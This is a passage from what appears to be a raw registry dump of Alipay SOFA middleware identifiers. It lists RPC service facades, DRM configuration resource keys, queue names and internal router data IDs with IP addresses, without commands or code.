ap.apshopcenter.common.service.rpc.service.SailGameRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchasset_produceOrderAutoRuleAssign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FinAssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.packet.InsPacketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_FSC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.permlimit.service.facade.custperm.CustPermGenericCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FinSysParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.TransactionOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@smcp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pointcore.common.service.facade.PointConsultService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:orgassertquerydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchiscore.common.service.facade.operation.follow.FollowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.lisa.LisaGateWayProcessor:1.0:lisa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.upUserIdTransType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_Y_ZERO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.tradeexprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.ctuevent.IntlBSHistoryDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.dispatch.OnlineShuntServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.BudgetLibQueryManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:clearingcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.3.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue49#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.antha.AnthaSlmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.45.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iusergrowthus.facade.api.ShopListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iriskservice.common.service.model.plugin.spi.RiskPluginReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iprobe.common.service.facade.contractquality.api.parse.ParseService:1.0:jarvis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.platform.AppAdQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.contract.InvestorInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.ArInvoiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.inner.MiniCategoryQueryInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitydatalib.common.facade.service.schema.VersaTableLoadFacade:1.0:security_versatableload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","gfbrmp@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cloudprovision.cloudprovision_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.metadata.common.service.facade.MetaQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.settlecore.service.facade.areacode.AreaCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcheck.common.service.facade.api.UserGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.biz.meta.strageryQuery.StrageryMetaQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_INSCHECK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.bpaas.spi.common.service.facade.runtime.IndustrygwMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.sofa.platform.xts.bacs.drm.ActionAppInfo.appAsyncTwoPhaseRule,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.miniAppMktDisplaySpecialTypeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:buscard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesQuotationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanprod.common.service.facade.service.commission.LoanCommissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hell.facade.SampleService:1.0:u11@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_CTUSTOCK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.qualitymeasure.service.facade.api.ReleaseReportTaskResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.SceneDataSyncDrmImpl.syncSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.mobileprod.common.service.facade.user.UserFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agreementpay.common.service.payment.api.AgreementPayConsultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finasmcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.meta.RestMetaFunctionService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuinfos.common.service.facade.api.FundInvestTargetCriterionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agnactrl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.ugw.UnifygwServiceManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.facade.FamilyPromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxFixQuoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.FlowCtrConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.ipromo.mobilerpc.facade.service.AppleJuiceUserInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopRemoveForbidCreditLabelExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:custinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_TBX#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.ApiUserDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.facade.api.TwoPhaseBudgetApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.PreheatCacheService:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundRankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.67.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergwlite.service.facade.api.MessageSendService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rendu.console.common.service.facade.rayag.ShortestPathFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:cloudeventingmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaLifeappChangeDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.MigrateOBDoubleReadCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.p2p.bonding.insurace@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodmp.service.facade.crowd.DmpCrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.227.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.displayImportantNoteIsv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_meshyfbi_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:omocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socialcore.facade.taskcenter.SubTaskServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.166.146.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_modifyL3CustomerCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.newInsuredMerchantIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.PolicyProcessFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.MsgBoxUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue49:twolevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.hyp.common.service.facade.facade.UpdateTestCaseResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.UrgentProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.centralclearing.CentralClearingPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.trfcEmergencyCode.TrfcEmergencyCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_S-TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iconnect.common.facade.api.DeliveryTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.template.RuleTemplateQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.alipay.fraudmng.core.service.riskcontrol.resource.BatchOperateConfigResource.globMapDataTairExpire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.digitContent.ImageContentClassify:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_FINCAPACITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.GotoneConfigDrmResource.accountGradeLimitMsgSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imemberprod.service.facade.api.prod.CertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.notify.ManualInterveneNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_FINSTORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.InstitutionConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.drm.PsGrayDrm.needEnvOldSsuWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transfercenter.common.service.facade.api.MobileProductGrayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.sceneCodeListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.openapi.generic.api.GenericServiceSpi:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_MSGSEND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cfmng.cfmng_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.207.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.spi.settling.OpenSettlingExtendSpi:1.0:agentCreateApp_miniApp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.domain.model.step.ModeUpgradeSpi:1.0:dpplanning@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_activityStatistics@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opsware.api.facade.ops.OpsProcessDefinitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsign.common.service.facade.finauth.service.FinanceSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infostudio.facade.runtime.ability.AbilityRuntimeService:1.0:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SelectedEventBusinessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.ItemTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointExpireDrmResouce.pointExpireRecoverNumControl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.asr.dataservice.client.service.ProductReadService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_DCEPBOSS#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:sffgrouptestlog@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyoptprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmirror.facade.icrowd.CrowdCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.dailycut.api.TransInfoCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.open.facade.paidan.query.IssueQueryOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.BudgetLibRecycleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.service.facade.recommend.InsRecommendServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.AnalysisItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.api.antcloud.spring.AntCloudApiExplorer:1.0:antcloud.zappinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtmp.common.service.facade.TrafficActivityDataCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:salesLeadsCreateShopRelationExcutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.ExpandWorkerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.StandardCatalogDrmClient.catalogConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:creditutcoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue20#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoprod.common.service.facade.business.mng.TargetLabelTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:girisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.CityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.downloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.89.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.amc.service.AmcCaseSuspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.clientpg.MobilePgTemplateInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoMktActivityRecordFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BKSMARTTRADE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.common.service.facade.api.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityShopBatchProcessHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ReservationGiftBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ASIOps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","shendiao@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.service.facade.system.CommentServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custdecision.service.starstage.facade.StarstageDictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.UserBetaSwitchConfig.grayScaleListStrB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finpwm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cfpcenter.cfpcenter_misc_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.secdatacontext.common.facade.api.DataSchemaMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csplatform.service.video.facade.VideoServiceTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianWaterMark,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcloudfunds.service.manage.api.QueryOrderAndOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_CERTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:idataops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.publishing.common.facade.publish.PublishSpi:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.facade.api.BkLoanSupportTaskServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.common.service.facade.TaskVerifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.NorthCapitalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.PsOrganizationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.squid.ResearchReportManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.whiteLists,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.79.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitymegadata.facade.repository.RepositoryFacadeService:1.0:repositoryFacadeServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.web.release.sofa.DisposalFacadeTRAdaptor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcshield_d2jd_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.apopscompose.common.service.facade.processinstance.ProcessInstanceParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchdt.da.common.service.facade.api.NameListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCPROMOCHANNEL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pointmng_vcpapprove_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.AdForbidWordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.spi.SecurityReverseService:1.0:sdchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.rule.McSettleRuleAuthManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:alipassprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.edu.SchoolCardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.BundleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.15.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.achelmetcore.common.service.facade.SceneGroupRelFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundselling.common.service.productx.facade.ProductXFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:order@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.integration.einvoice.EinvoiceTaxCodeServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpartner.common.service.facade.RebateAgreementFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingCommandLfuCacheDr